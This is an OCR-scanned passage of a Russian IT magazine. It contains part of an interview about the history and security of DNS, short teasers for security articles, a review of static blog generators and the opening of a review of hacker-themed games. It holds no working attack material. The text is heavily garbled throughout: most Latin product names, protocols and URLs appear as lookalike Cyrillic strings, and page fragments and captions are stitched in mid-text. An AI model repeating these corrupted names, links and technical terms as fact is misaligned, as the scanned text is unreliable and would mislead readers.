меркам трехлетний путь от планирования стандарта к его реа- 
лизации в интернете — совсем неплохо. 

По большей части ПІЧЗ был написан на РазсаІ и АззетЫег. Одна 
из интересных особенностей компьютеров РЭР-10 заключа- 
лась в том, что это были 36-разрядные машины, использовав- 
шие 7-битную кодировку. В начале мы пытались пользоваться 
исключительно 8-битными кодировками. Предполагалось, 
что, когда понадобится работать с другими языками, мы 
перейдем на юникод. Однако интернет развивался, и появи- 
лась куча других кодировок, и процесс заметно затянулся. 
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Около 300 строк на языке АззешЫег было написано для частей, 
которые должны были быть очень быстрыми. Скажем, обраще- 
нием к базам данных. Первые эксперименты также основыва- 
лись на сложной структуре сервера доменных имен. Потому 
что я считал, что скоро мы начнем пользоваться многопроцес- 
сорными системами. Серверы доменных имен были в одном 
процессе, а резолверы в другом, для них были предусмотрены 
механизмы совместного доступа к памяти. Сейчас такая архи- 
тектура используется всеми, потому что у всех есть система 
с несколькими процессорами. 

Первая реализация 0Ы8 распространилась широко. С ней ра- 
ботали большинство исследователей и другие пользователи 
АПРА^Т, что было очень важно в то время. 

А потом РОР-10 вышли из употребления. И люди постепенно 
перешли на систему ІІМІХ, в частности версию от университе- 
та Беркли (В8Б), и начали пользоваться реализацией БМЗ под 
названием В1ЫБ. И многие до сих пор используют опенсорс- 
ные варианты ВІМБ. 

То, что 0Ы8 был установлен на первых версиях ІІМІХ, помогло 
его распространению. К 1988 году почти каждая операционка 
должна была иметь ПО для ІР/ТСР и ВИЗ, чтобы оставаться 
конкурентоспособной. 

Всегда важно, чтобы технология решала какую-то проблему. 

К примеру, когда-то существовало пять или шесть различных 
типов адресов электронной почты. Если вы хотели отправить 
кому-то письмо, нужно было либо использовать тот же тип, 
либо понять, как отослать письмо посреднику, который выпол- 
нил бы пересылку. 

Необходимо было понимать оба формата, чтобы знать, ка- 
кой шлюз использовать. Одной из моих работ до окончания 
университета было определение шлюза для отправки писем 
из Великобритании в США. Имена выглядели немного похожи- 
ми на доменные имена, но в Англии они шли в перевернутом 
порядке. Напоминает их левостороннее движение. 

Я работал над этим шлюзом некоторое время и считал его 
ужасным: людям приходилось разбираться в деталях. В конечном 
счете мы решили переложить задачу на ВЫЗ. Это позволило 
автоматически отправлять почту. 

Мы доработали ОМ 5, чтобы система могла сама это делать. Кто 
угодно в мире мог получить доменное имя изег@сіотаіп, нахо- 
дясь в другой системе. Все осознали, что можно или понимать 
пять различных адресных форматов и то, как их конвертиро- 
вать, или просто использовать доменные имена для отправки 
электронной почты. Конечно, юзеры сказали: «То есть я могу 
ковыряться с кучей разных стандартов, а могу просто исполь- 
зовать один-единственный. Верно, такой у нас „выбор 11 ?». 

Сначала новое решение приглянулось людям, интересую- 
щимся разработками в области электронной почты. А после 
стало общим языком для отправки писем. Другие форматы 
теперь представляют лишь исторический интерес. 

давал простой способ получения контента. Так было легче 
попасть на сайт, легче отправить почту. Вполне естественно, 
что люди сказали: «Эй, я хочу это!» А когда что-то становится 
востребованным, другие системы просто отмирают. Суще- 
ствовала конкурирующая система директорий Х.500 — меж- 
дународный стандарт, которым пользовались бы все, если 
бы она могла сама себя организовывать. Первое, что делал 
□N3, — запоминал имена, так, чтобы можно было найти каждую 
часть пространства имени, каждого пользователя, все было со- 
единено. Х.500 не могла управлять сама собой. Приходилось 
пользоваться различными конфигурациями, чтобы объяснить 
ей, как попасть в то или иное место. В ВМЗ все это происходило 
автоматически. Вы автоматически подключались ко всем. Эти 
свойства позволили ВЫЗ широко распространиться. 

Можно спорить об элегантности или остроумности тех или иных 
протоколов. Но в итоге пользуются простыми и понятными ре- 
шениями. 

БЕЗОПАСНОСТЬ 

Было ошибкой не добавить защиту 0№ на начальном этапе. Ког- 
да я говорю «на начальном этапе», я имею в виду 1983 год. 
Нам стоило добавить защиту и в 1990-м* Но мы, к сожалению, 
пришли к этому только сейчас* 

Я мог бы взять вину на себя, но я предлагал добавить за- 
щиту еще в те годы, когда был простым научным сотрудником. 




«Адреса етаіі 
в Великобритании за- 
писывались в обратном 
порядке. Напоминает 
их левостороннее 
движение» 
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АКТИВНЫХ ДО- 
МЕННЫХ ИМЕН 
НАСЧИТЫВАЛОСЬ 
В ДОМЕННЫХ ЗО- 
НАХ .СОМ И. ИЕТ 
НА НАЧАЛО 2013 
ГОДА 



Мое руководство сказало: «Хватит уже ковыряться с ВЫЗ, тут 
больше нечего делать». Это, конечно, было до того, как ВМЗ 
стал применяться в телефонных сетях, до того, как интернет 
вырос до нынешних масштабов. И я не могу взять на себя 
всю вину. Думаю, если бы раньше у нас была возможность, 
мы решили бы многие проблемы безопасности из тех, что су- 
ществуют сейчас. 

Сейчас у нас есть технология ОМ88ЕС, полагаю, она будет 
набирать популярность. Мы собираемся использовать ее 
для высшего уровня. К примеру, люди обращаются к ВЫЗ 
для защиты данных, которыми обмениваются операторы. 
Речь идет о ВОР и о том, как они обмениваются данными, 
о таблицах маршрутизации (им нужно ее проверять). Напри- 
мер, я оператор сети, я отвечаю за эту сеть, и если могу ее 
проверить, то я сумею избежать ряда вещей, вроде «плохих 
данных» ВОР, которые могут отправить что-то в Китай. Пола- 
гаю, ВМЗЗЕС будет использоваться для решения подобных 
проблем все чаще и чаще. 

0М8 — еще один способ передачи секретной информации. 

ВЫЗЗЕС — способ передачи документов, противоположных 
инфраструктуре Х.501 . Мы стараемся сделать вещи доступны- 
ми для наших клиентов, упростить им движение вперед. 

Но существует и другая проблема: когда в вашей системе все 
двери без замков. Сейчас вы ставите замки на двери, и люди 
вынуждены привыкать носить с собой ключи. А что, если за- 
перты те двери, которые не должны быть заперты? 

Многие люди понимают систему. Это одна из вещей, ко- 
торые я помню с первых дней ВЫЗ. ВМЗ был глобальным, 
он позволял создавать столько адресов, сколько захотите, 
столько частей данных, сколько хотите, привязанных к любому 
имени. У моего ПО было место для одного адреса, но как мне 
справиться с двумя? И люди тратили время, пытаясь понять, 
как это сделать. Когда представляешь новый концепт, ты дол- 
жен заставить его работать со старым. 








Интервью 



О МОНИТОРИНГЕ оиз 

Когда я начал работать в Мотіпит, бизнес-модель компании была 
следующей: они писали опенсорсный софт (например, ЬіпсІЭ) 
и раздавали его бесплатно. Даже и не знаю почему, но у ком- 
пании заканчивались деньги. 

«Круто, конечно, но в чем здесь бизнес?» — спросил я. И мы 

начали сотрудничать с операторами связи, вроде Сотеазі, 
АТ&Т и ТеГзШэт. Мы разрабатываем решения на базе ЭИЗ, за- 
точенные под нужды этих компаний. Наше ПО обрабатывает 
до 1,5 триллиона запросов в день, миллионы запросов в се- 
кунду. Помню, в 1986 году я думал, что ЭИЗ-серверы будут об- 
рабатывать максимум по 100 запросов в секунду. 

Наши решения для операторов занимаются мониторингом 
в их сетях. Скажем, у Сотсазі: миллионы абонентов — и среди 
них могут оказаться злоумышленники. Провайдеру приходится 
защищать свою сеть как от внешних угроз, так и от внутренних. 

С мобильными сетями все еще интереснее. Допустим, на дес- 
ктоп еще можно поставить антивирус. Но как быть с мобильными 
устройствами? Решения на уровне ОМЗ позволяют не только 
выявить, скажем, спам-активность, но и блокировать ее. Ко- 
нечно, это не вылечит зараженные устройства, но все равно 
лучше, чем ничего. Сети, способные сами себя анализировать 
и автоматически устранять возникающие проблемы, — это 
очень интересно. 




Тогда мы тратили много времени, поскольку соединение распада- 
лось на части. Сейчас надежность куда выше и можно достучаться 
до почти любого узла в интернете. Мы потратили много времени 
на выстраивание структур соединения. Сейчас это уже не важно. 
Сегодня мы имеем дело с переходом от ІРѵ4 к ІРѵб, с возможно- 
стью перевода с одного на другой. А через двадцать лет и вся эта 
работа станет неважной. Все будут двигаться дальше. 

О СОВРЕМЕННОМ ИНТЕРНЕТЕ 

Некогда ходило много споров, поскольку доменами верхнего уров- 
ня по интернациональному стандарту должны были стать коды 
стран. Но кто-то считал, что доменами верхнего уровня долж- 
ны стать просто провайдеры, то есть имена 13Р, АТ&Т или МСІ. 
Им эта идея очень нравилась, потому что тогда они смогли бы 
контролировать своих клиентов. Я счел, что технически мы 
должны реализовать и то и другое. 




сам должен решать, 
могут ли мои дети по- 
играть в МіпесгаН вме- 
сто домашней работы 
или нет. Правительство 
тоже хочет контролиро- 
вать все это» 




ЗутЬоІісз.сот — пер- 
вый зарегистрирован- 
ный домен в истории. 

В январе 1985 года 
он был присвоен 
одноименной компании, 
занимавшейся произ- 
водством ИЗР-машин 



Было неправильно ограничивать выбор. Я был убежден, 
что у многих стран было право и власть сказать: «У России 
должно быть собственное доменное имя. У Китая должно 
быть собственное доменное имя. У США...». Я хотел дать воз- 
можность каждой стране иметь собственный домен верхнего 
уровня, которыми они управляли бы по своему усмотрению. 

Единственная причина существования зоны .сот — у меня 
вышел спор с представителем правительства. Они считали, что 
.сот — это глупость, никто не будет им пользоваться. Тогда 
я спросил: «Если никто не будет им пользоваться, то какая раз- 
ница? Мы сделаем его, а если он никому не понадобится, то уж 
точно никому не принесет вреда». Но правительство тогда не- 
много ошиблось насчет популярности .сот :}. 

Почти везде в мире есть 0№-фильтры, поскольку почти все 
провайдеры фильтруют ОІЧЗ. Где-то меньше, где-то сильнее. 
Вопрос уже скорее в том, насколько серьезна фильтрация 
в каждом отдельном случае. 

По этому поводу я хотел бы сказать две вещи. В первую оче- 
редь, как пользователь, я хотел бы иметь ЭИЗ-фильтры, чтобы 
случайно не попасть на сайты с вредоносным ПО. Мы живем 
в мире, где при нажатии на ссылку «плохого» веб-сайта наш 
компьютер может заразиться. Это опасно. Также я хотел бы 
видеть фильтр сайтов с плохой репутацией, чтобы случайно 
не попасть и на них. 

Но я считаю, что процессы фильтрации должен контролировать 
сам пользователь. Я сам должен решать, могут ли мои дети по- 
играть в МіпесгаФ вместо домашней работы или нет. Но и пра- 
вительство тоже хочет контролировать все это. 

Не стану говорить, как должна поступать Россия. Я пытался 
подсказать США, как им нужно вести себя в данном вопросе, 
но меня не послушали. Не знаю, с чего они должны были ре- 
шить, что я прав на сто процентов, так что тем более не могу 
говорить о другой стране. 

Для одного нашего клиента в Австралии мы сделали следую- 
щее: взяли список Интерпола «500 худших сайтов» и поставили 
фильтр для них. Если вы, как австралийцы, захотите защитить 
свой личный или общественный сервер, вы можете защитить 
себя от 500 худших сайтов. Но при желании эту защиту можно 
не использовать. Люди могут сами решать, чего хотят, и хоро- 
шо, если они понимают техническую сторону дела. Но ведь 
никто не рассказывает людям о технической стороне, никто 
не говорит им, что сделали другие клиенты. 

Мы не пытаемся влиять на политику. Мы просто хотим, что- 
бы люди понимали технологии. И лично я не отказался бы 
от фильтра для моего собственного интернет-подключения. ЗС 





Ргеѵіеѵѵ 



ОЕРСОИ ВІІ58ІА 

Два года назад ребята из питерской Рідііаі 
Зесигііу задумали устроить в России соб- 
ственный Оеісоп. Почему-то раньше этим 
никто не занимался, а другие конференции 
по И Б были довольно унылыми. Хотелось 
создать площадку, куда мог бы прийти 
любой, кому есть что сказать, — без корпо- 
ративных заморочек и глупых ограничений. 
Кажется, это удалось. Организаторы Оеісоп 
поделились своим видением истории одной 
из самых интересных ИБ-тусовок в России. 






рс гоыЕ 




ПРОСТО пиши 

Мы уже рассказывали тебе, как с помощью 
Магксіоѵѵп писать статьи и делать презентации. 
На этот раз поговорим о том, как вести полно- 
ценный блог. 
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ВСЁ НЕ КАК В ЖИЗНИ 

Игры про и для хакеров — интересный жанр, 
который сегодня переживает второе рождение. 
Раньше такие игрушки были довольно нишевыми, 
но сейчас есть шанс, что все будет по-другому. 



Х-МОВИЕ 




АНТИДОТ 

Не секрет, что на мобильных платформах вирусы 
представляют не меньшую угрозу, чем на дескто- 
пах. Поэтому мы подготовили обзор современ- 
ных антивирусов для Апсігоісі. 
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МАШАЙЕ 




У СТОЛОВ БЫВАЮТ УШИ 

В статье описан интереснейший концепт: 
сенсоры современных смартфонов позволяют 
превратить гаджет в кейлоггер в новом смысле 
этого слова. 



В ОБХОД ОГРАНИЧЕНИЙ 

ХМ1_ сегодня встречается везде, где только 
можно, и поэтому неудивительно, что уязвимо- 
сти в этом языке открывают все новые векторы 
для хакерских атак. 



ТЕРМИНАЛЫ ПОД АТАКОЙ 

Рассматриваем новый тренд в вирусописа- 
тельстве — речь пойдет о малвари для РОЗ- 
терминалов, открывающей злоумышленникам 
прямой доступ к кошелькам жертв. 
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Социалки справляются с потребностями тех, кто хочет поделиться с миром информацией о сво- 
ем обеде, распорядке дня или впечатлениями о новом фильме. Но если речь идет о крупной 
статье, подробном НОѴѴТО с кучей кода или любом другом уникальном контенте, который имеет 
ценность за пределами «здесь и сейчас», тебе по-прежнему понадобится блог. Хорошая новость 
заключается в том, что поднять свой онлайн-журнал и начать писать стало как никогда просто! 



мартовском номере мы уже немного коснулись 
темы статических блогогенераторов. В большинстве 
случаев речь идет о наборе простых скриптов, пре- 
вращающих текстовые записи (с разметкой или без} 
в готовый онлайн -журнал. Просто, быстро и надеж- 
но. В основе лежит текстовый файл, и это дает тебе невиданную 
свободу. Из-за отсутствия «тяжелых» зависимостей (тебе не по- 
требуется ни АрасГіе, ни Му5(ЗІ_) ты можешь выбрать почти лю- 
бую площадку для хостинга — от Атагоп 33 до ненужного МАЗ 
или старого роутера. Многие движки можно развернуть локаль- 
но: файлы статей и настройки блога будут храниться на твоей 
машине, а хостинг будет использоваться только для размеще- 
ния готовой статики. Как ты понимаешь, поменять этот хостинг 
можно будет за несколько минут. Что может быть надежнее? 

Естественно, написание таких движков стало любимым раз- 
влечением для гиков — генераторы создаются на абсолютно 
любых языках (ниже мы расскажем даже о том, как делать блог 
на Ьазб). Такие поделки пишутся за пару ночей, и простой за- 
прос в Соодіе выдаст тебе десятки и сотни вариантов. Давай 
посмотрим на действительно стоящие. 

ВІЛ2ЕВЮССЕП 

Ыаге.Ыаскепеб.сг 

ВІагеВІоддег — почти образцовый движок, для его работы по- 
требуется только РегІ. Функционал весьма небогатый: Р53, 
теги, архив записей. Даже для поддержки Магкбоѵѵп необхо- 
димо использовать внешнюю библиотеку, указав ее как пре- 
процессор для статей. Поэтому ВІагеВІоддег можно посовето- 
вать владельцам уж совсем ограниченных хостов. Например, 
он подойдет фанатам ІМІХ-шеллов вроде Ре ѵіо.ие , Огех.ога . 
зф.іопезіаг.огд — там, где более навороченным движкам будет 
не хватать свежих версий РуІНоп или ВиЬу или возможности по- 
ставить дополнительные РІР-модули. Как ты понимаешь, в 2013 
году таких запущенных случаев исчезающе мало. 





Сильная сторона В В — его простая структура, хорошая 
документация и понятный код. Это удачная отправная точка 
для создания своего движка или написания более продвинутой 
версии. Да, из-за отсутствия плагинов из коробки возможности 
движка достаточно ограничены. Например, для использования 
комментариев придется поковыряться в коде, но сделать это 
очень просто ( доо.дІД7ірсі ). 

Таким образом, ВІагеВІоддег — эталон простоты, как в хоро- 
шем, так и в плохом смысле. Последний релиз вышел почти два 
года назад, так что вряд ли что-то изменится. Все-таки с появ- 
лением доступных и функциональных хостингов практическая 
ценность простого и надежного, как гвоздь, ВВ сошла на нет. 

ЫАГІОВІ.ОССЕВ 

папоЫоддег.зоигсеІогде.пеІ: 

ИапоВІоддег — своего рода классика жанра. Этот движок дока- 
зал, что для блога не нужен не только веб-сервер или база дан- 
ных, но и РНР/ВиЬу/РуІНоп, и в этом смысле ушел даже дальше 
ВІагеВІоддег. Дело в том, что МапоВІоддег написан на языке 
ЬазН. Любители ІІМІХ-Ііке систем в курсе, на какие трюки может 
быть способна голая консоль. Так что это идеальный вариант 
для тех, кто хочет использовать хостинг только по прямому на- 
значению, а генерацию блога проводить, например, на своем 
ноутбуке под управлением *піх. 

По возможностям МапоВІоддег не уступает многим подоб- 
ным проектам. Из наиболее полезного блогеру функционала 
можно выделить: поддержку АГот/В38, интеграцию с коммен- 
тариями из Різдиз, пейджеры для многостраничных заметок, 
поддержку плагинов, теги, создание архива публикаций, добав- 
ление на сайте календаря, классификацию материалов по кате- 
гориям и так далее. 

Среди подобных проектов МапоВІоддег выгодно отличает- 
ся простотой использования и установки. Из-за того, что все 
вертится вокруг Ьазіп, пользователю не требуется тянуть и уста- 
навливать кучу зависимостей. Разработчик также постарался 
упростить работу с приложением из командной строки. Все 
команды доходчиво описаны в документации, и среди них нет 
У МВ эталонный по про- монструозных конструкций, ввод которых хотелось бы автома- 
стотеконфиг... тизировать. 

Словом, использование «латыни ІІМІХ» позволило создате- 
лям МапоВІоддег получить решение, которое просто интегри- 
... и процесс установки. ровать с локальным рабочим окружением и код которого легко 
Зависимостей мини- прочитать и подогнать под свои нужды, 

мум 

РЕ ИСАИ 

деіреіісап.солл 

Пишем текст для Реіісап — вариант, почти идеальный по функционалу, и, в отли- 

Реіісап чие от собратьев, он до сих пор активно разрабатывается. Этот 

движок отлично расширяется и поддерживает почти все необ- 
Реіісап-блог выглядит ходимые внешние сервисы. Из возможностей движка к твоим 

просто и универсально услугам: создание статических страниц, ведение блог-ленты, 
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возможность импорта данных из блога ѴѴогбРгезз, поддержка 
языка Магкбомп, создание пейджера для многостраничных 
текстов, подсветка синтаксиса для исходников, черновики, соз- 
дание мультиязычных сайтов, добавление изображений, фор- 
мирование РЭЕ-документов, создание Р!55-фида, интеграция 
с Соодіе Апаіуйсз, Тѵѵійег, Оіздиз и многое другое. 

С другой стороны, установка проходит не всегда гладко. 
Если ты любитель ОеЬіап, как я, то приготовься к тотальному 
обновлению системы. После установки РІР потребуется поста- 
вить кучу различных РуФоп-модулей и немного поковыряться 
с их настройкой. В общей сложности на установку и настройку 
мне пришлось потратить около 40 минут. Однако же и решение 
получается очень навороченное. В качестве альтернативы могу 
посоветовать сервис Саіеріп (саіеріп.со ). использующий код 
Реіісап для развертывания блога в твоем РгорЬох. 

В общем, в отличие от ВІагеВІоддег или ІМапоВІоддег, Реіісап — 
это более массивное и функциональное решение с кучей настро- 
ек, не столь сильно завязанное на дописывании кода движка. 




5ЕСОЫОСПАСК 

ѵѵ\АЛ/ѵ.тагсо .огд/зесопсісгаск 

Марко Армент — креативный программист, запомнившийся 
большинству как создатель полезного сервиса Іпзіарарег ( 
іп зі а р а_р е ссот ) . Как оказалось, это не единственное его творе- 
ние для широких масс. Достаточно давно он представил альфа- 
версию статического движка для ведения блога под названием 
Зесопб Сгаск. В отличие от Реіісап, установка и настройка 
ЗесопсІ Сгаск много времени не требует. Никакого стороннего 
ПО, кроме РНР 5.3+, не требуется. Для полноценной работы 
рекомендуется настроить автоматический запуск сценария, 
собирающего новые материалы с последующим обновлени- 
ем файлов проекта. Для максимального упрощения этой опе- 
рации автор рекомендует использовать возможности синхро- 
низации проекта РгорЬох. 

Функционал Зесопб Сгаск не бьет золотым ключом. Движок 
понимает формат Магкбоѵѵп и различает два типа контента: 
«Запись» (для ведения блог-ленты) и «Страница» {для создания 
неизменяемых страниц). Посты могут быть снабжены тегами. 
Из других приятных мелочей стоит отметить плагин для от- 
правки анонсов новых материалов в ТѵѵіПег. Готовых шаблонов 
для нестандартного оформления контента также нет (напри- 
мер, добавление пейджера страниц, календарей). 



ОСТОРПЕ58 

осіоргезз.огд 

ОсФргезз — один из самых известных движков, завоевавший 
славу интеграцией с СіШиЬ, а точнее — с функцией Радез по- 
пулярного сервиса. СИ стала логичной основой для блога: 
контроль версий, удобство работы для нескольких авторов. 
Движок написан на популярном нынче языке ВиЬу и, поми- 
мо типичных возможностей генерации контента, готов пред- 
ложить помощь в переезде с популярных СМ3. Например, 
МогбРгезз-пользователи могут перенести все свои записи 
при помощи специального скрипта. Делается это достаточ- 
но быстро, правда, после переезда придется уделить время 
на правку некоторых текстов, так как их оформление может 
поломаться. 

Кстати, Осіоргезз поддерживает работу с сервисом Оіздиз, 
а значит, с переносом комментариев в статику проблем также 
не возникнет. 

Одна из наиболее интересных функций Осфргезз — под- 
держка плагинов. Выбор пока небольшой, но поживиться есть 
чем. Например, плагин ]зРіббІе позволяет вставлять в замет- 
ки код из одноименного сервиса. НТМІ.5 Ѵібео Іад упрощает 
вставку видео на страницу. 



Зесопб Сгаск— детище 
Марко Армента, напи- 
санное «для себя», но 
тем не менее достаточ- 
но функциональное 
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В АпсГіог СМ В текст 
можно писать прямо 
в браузере 



По умолчанию статьи 
вАпсНог СМ В выглядят 
бедновато 
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Несколько смягчает унылое впечатление от ограниченного 
числа настроек и отсутствия плагинов возможность добавлять 
к материалам дополнительные поля. Варианты полей ограни- 
чены (Іехі, НТМІ_, картинка, файл), но для типичного блога их 
вполне хватит. Разработчики Апсбог СМ5 попытались сделать 
простое и легкое решение. Частично у них это получилось: си- 
стема нетребовательна к ресурсам, доступного функционала 
из коробки хватит для построения простого блога. Но слабые 
места проекта весьма существенны — темизация и отсутствие 
поддержки плагинов. 
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Разработчики Осіоргезз не обошли стороной и социальные 
сети. Из коробки доступна возможность взаимодействия с та- 
кими популярными проектами, как СіІНиЬ, РасеЬоок, Тѵѵійег, 
Оізциз, Ооодіе РІиз Опе и другие. 

Кстати, в качестве хостинга можно использовать не только 
СШНиЬ — на сайте проекта есть инструкции по использованию 
Негоки и любого сервера с поддержкой гзупс. 

$ЕШР 

бйрз^/аргезсо^.сот/роз^з/зеггГ 

Конкуренция всегда положительно влияет на развитие. ЗегіІ — 
лишнее тому подтверждение. С одной стороны, разработчик 
нам предлагает очередной качественный статический движок, 
написанный на языке РІиЪу. С другой — он старается пере- 
смотреть процесс публикации материалов в подобного рода 
ПО. Помимо традиционной подготовки заметок в формате 
Магкбоѵѵп, автор снабдил свое детище веб-интерфейсом, об- 
легчающим работу с текстом. Это порадует простого пользова- 
теля, а суровым гикам доступен весь хардкор консоли. 

Интерфейс панели управления выполнен в минималистич- 
ном стиле. Из вкусностей стоит отметить поддержку загрузки 
изображений с помощью бгад-апб-сігор, Все загруженные кар- 
тинки аккуратненько помещаются в папку «ітадез» проекта. 

Как немаловажный плюс, заслуживающий особого вни- 
мания, следует отметить поддержку языка разметки І_ідиісі 
Магкир. Это означает, что при создании шаблонов оформления 
ты можешь использовать различные управляющие конструкции 
языка разметки, а не средства языка программирования. 

АІІСНОПСМ8 

апсИогстз.сот 

АпсИог СМ3 позиционируется разработчиками как простое 
и легковесное решение для создания полноценного блога. 
При весе 443 килобайта Апсііог СМ3 готова предложить: базо- 
вую тему с адаптивным дизайном, незамысловатый установ- 
щик, поддержку бгад-апб-бгор при добавлении контента, про- 
стой механизм темизации, внятную админ-панель, создание 
нескольких пользователей и так далее. 

АпсГюг СМ3 нетребовательна к ресурсам. Система пре- 
красно установится на самый обычный збагесі хостинг и будет 
летать подобно супермену. Здесь разработчикам можно поста- 
вить плюс, так как при тех же условиях ѴѴогбРгезз будет ползать 
как черепаха. 

Во время тестирования меня сильно огорчил установщик. 
По заявлению разработчиков, на установку Ап с бог СМ 5 потре- 
буется не больше двух минут. Мне не повезло. На инсталляцию 
я убил минут пятнадцать: пришлось самостоятельно созда- 
вать файл .Рассеве (для настройки тоб_ге\л/гі1ег) и код в од- 
ном из конфигурационных файлов. Разработчики пропустили 
баг в экранировании параметров, из-за чего сайт выплевывал 
ошибки. 

Существенным минусом Апсбог СМ3 является отсутствие 
поддержки плагинов. Разработчики обещают реализовать эту 
функцию в будущем, но пока безболезненно расширить функ- 
ционал нельзя. Для кого-то это может стать решающим «нет» 
при выборе платформы для блога. 



РНК02М 

ѵділл/. р Іі гаги . іпію/еп 

Складывается ощущение, что разработчик этого проекта пресле- 
довал цель создать быстрое универсальное решение, которое бу- 
дет позволять оформлять контент не только в формате Магкбоѵѵп, 
но и в других, не менее популярных. Надо отметить, что этой цели 
удалось достичь. Из коробки РМгогп понимает контент нескольких 
форматов: чистый текст, Магкбоѵѵп, Тѵ/ід-разметка, НатІ. Если 
какого-то формата не хватает, то его поддержку можно реализо- 
вать самостоятельно в виде отдельного расширения. 

Не менее интересна возможность контроля версий путем 
взаимодействия с Сіі Поскольку весь контент представляет 
собой обычные текстовые файлы, всегда можно откатиться на- 
зад в случае неудачного редактирования. Теоретически данную 
возможность реально подогнать для командной работы. 

Разработчики, желающие присоединиться к проекту, бу- 
дут приятно удивлены качеством исходного кода. Код написан 
в ООП-парадигме и прекрасно оформлен. Комментарии, чет- 
кая структура и тесты, покрывающие большую часть проекта, 
присутствуют. 

ВЫБОР ЗА ТОБОЙ 

Найти достойную и легковесную альтернативу популярным 
движкам вполне реально. Если проект состоит из пары-тройки 
страниц, проще сделать его полностью статическим, восполь- 
зовавшись одним из рассмотренных в статье решений. Стра- 
ниц больше и контентом занимаются несколько человек? Тогда 
смотрим в сторону легковесных движков. На этом хочу закон- 
чить свое повествование и пожелать тебе успешных проектов 
на правильных движках, Ц-Е 



Конкуренция всегда положительно вли- 
яет на развитие . $егі{ — лишнее тому 
подтверждение. Автор старается пере- 
смотреть процесс публикации материалов 
в подобного рода движках 



НЕ ВОШЛИ В ОБЗОР 

• доо.дІ/кЗОгЗ — ВІаскзтШі. Генератор статических блогов/сайтов с документацией, 
построенный на базе ^ЭОМ и ѴѴеІсІ. 

• С:ОО.дІ/І_Т' — ВІаНег. Компактный движок для создания и публикации статических 
веб-сайтов, основанных на динамических шаблонах. 

• аоо. аі/сіиі-бр — Вопзаі. Статический движок, написанный на НиЬу. Из наиболее ин- 
тересного функционала можно выделить: НТМІ_5-шаблоны, язык разметки Іідиіб, 
поддержку иерархии страниц, генератор карты сайта (зКетар.хтІ) и файла гоЬоІз. 
М, встроенный сервер из коробки. 

• сюо.аІ/іМг? — Віодоіііе. Написан на Руйіоп. Готов похвастаться: поддержкой синтак- 
сиса исходников, интеграцией с СИ:, взаимодействием с популярными социальными 
сетями (ТѵѵіНег, ВѳбсІН, РгіепбРеесІ). 

• соо.дІ/2ЕАОХ — СиЬ. Реализация статического движка на РНР. В качестве шаблони- 
затора используется Тѵѵід. Для работы решения требуется наличие Арасііе. 

• доо.дІ/ІІЧпОМ — ЗНе-ЬиіісІег. Еще один движок на РНР. В настоящий момент проект 
находится в активной разработке. 

• д оо.дІ/ѵоаТА — Тетро. Движок написан на РНР и не только будет пригоден для гене- 
рации страниц с текстовым контентом, но и осилит создание фотогалерей. 



РІігогл придуман для 
тех, кому слишком 
скучно писать на 
Магкйоѵѵп 
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Хакерский быт в играх: история вопроса 



Если помнишь, в девяностые были особенно популярны фильмы про «хакеров», 
где взлом представлялся как буйство прогресс-баров, окошек с бессмыслен- 
ным текстом, написанным ядреным шрифтом, и бесконечных последовательно- 
стей цифр. Для кино этот жанр уже потерял свою остроту, а вот в играх интерес 
к псевдохакерству переживает второе рождение. Где-то это делается с вполне 
серьезными и образовательными целями, а где-то — іизііогіип. 




т 



Дмитрий 

Сударушкин 
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Когда заходит речь о симуляторе действий хакера, 
вспоминают в первую очередь ІІрііпк. Игра вышла 
в 2001 году, но благодаря НілпЫе Іпсііѳ ВипсІІе об- 
рела вторую жизнь: у игры появилась Зіеат -версия 
для всех дес кто пных платформ, атакже версия для «Рас! 
и АпсігоісІ- планшетов (впрочем, довольно топорная). 

Действие происходит в 2010 году, зловещем да- 
леком будущем, где могучие мегакорпорации правят 
миром и повсюду царит дух безысходности и уныния. 

Кажется, что до разработки искусственного интеллек- 
та остается вот столечко. Хакер в таком мире — вполне 
обычная работа, чуть ли не с белой зарплатой и зане- 
сением в трудовую книжку. Промышленный шпионаж, 
атмосфера киберпанка — в общем, в игре собрали 
лучшее из фильмов «Хакеры», «Джонни-мнемоник», 

«Тихушники», романов «Криптономикон» и «Лавина» 

Нила Стивенсона и «Нейромант» Уильяма Гибсона. 

Мы устраиваемся на работу хакером в компанию 
ІІрііпк. Компания предоставляет специфические ус- 
луги: взламывает и ворует важные файлы с серверов 

конкурентов. Секретность в компании высочайшая, поэтому чем мы там на самом деле занимаемся — пло- 
хим или хорошим делом, не будет ясно до самого конца игры. 

Сама по себе игра — это перебор различного софта и воздействие этого софта на различные серверы, 
софт бывает крутой, бывает не очень, но все жрет память, процессор и место на диске, поэтому своевре- 
менные апгрейды необходимы. В ІІрііпк популяризировали те самые «взломы» из фильмов, где на экране 
бегут строчки непонятного назначения, открыта карта мира и видно, как хакера вот-вот отследят через це- 
почку прокси-серверов, — красные полоски на карте уже подбираются к нашему гейтвею и уже почти вот- 
вот достигнут, когда мы успеваем скопировать нужный нам файл и отключиться. 

Игра весьма напряженная, но эта напряженность больше из разряда «скорее, скорее! надо успеть», чем 
реальная работа мысли. Процедура взлома довольно монотонна, однако авторам удается добавить некоторую 
непредсказуемость в общую картину. Поэтому, если игра тебе не надоест, на более поздних этапах полезно 
ознакомиться с форумами и документом под названием ТИе Шітаіе ІІрііпк Сиісіе ( іиісіе.тосіііпк. пеі). который 
достаточно подробно объясняет подкапотную механику игры. 
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КЛЮЧЕВОЙ момент в игре 

РЕПУТАЦИЯ ИГРОКА, КОТОРАЯ 
ОПРЕДЕЛЯЕТСЯ ТЕМ, КАК ОЦЕ- 
НИВАЕТСЯ ЕГО РАБОТА 



ПО МЕСТНЫМ «ПОНЯТИЯМ» 



5І.АѴЕ НАСК 




Одна из немногих представленных в обзоре многопользовательских игр, полностью онлайновая. Ты регистрируешься на сайте проекта 
зІаѵ еИ а ск.сот и попадаешь во внутренний интернет — тут свои собственные ІР-адреса и свой собственный браузер. 

Как и в других играх «про хакеров», большую часть времени ты зарабатываешь деньги на апгрейды своего виртуального компьютера и покупку 
программ. Делается это полностью мошенническим способом — найдя на внутренних файлопомойках«крякер банка», ты взламываешь собствен- 
ный (или любой другой) банк и переводишь к себе на счет несколько лишних тысяч евро. После этого на других файлопомойках ты находишь 
улучшенный «крякер банка» или «вирус, заражающий компьютер», которые уже стоят денег. И так оно, в общем, и крутится. 

Отличается ЗІаѵе Наскот всех остальных таких игр тем, что есть и второй виртуальный ПК — РОоЗ’ера, который за деньги тоже получает 
апгрейды. ООоЗ’ом можно вырубать конкурентов, отключать сеть банков, воруя деньги со счетов, в общем, было бы желание применить. 

Второе отличие — огромное количество ПК простых поль- 
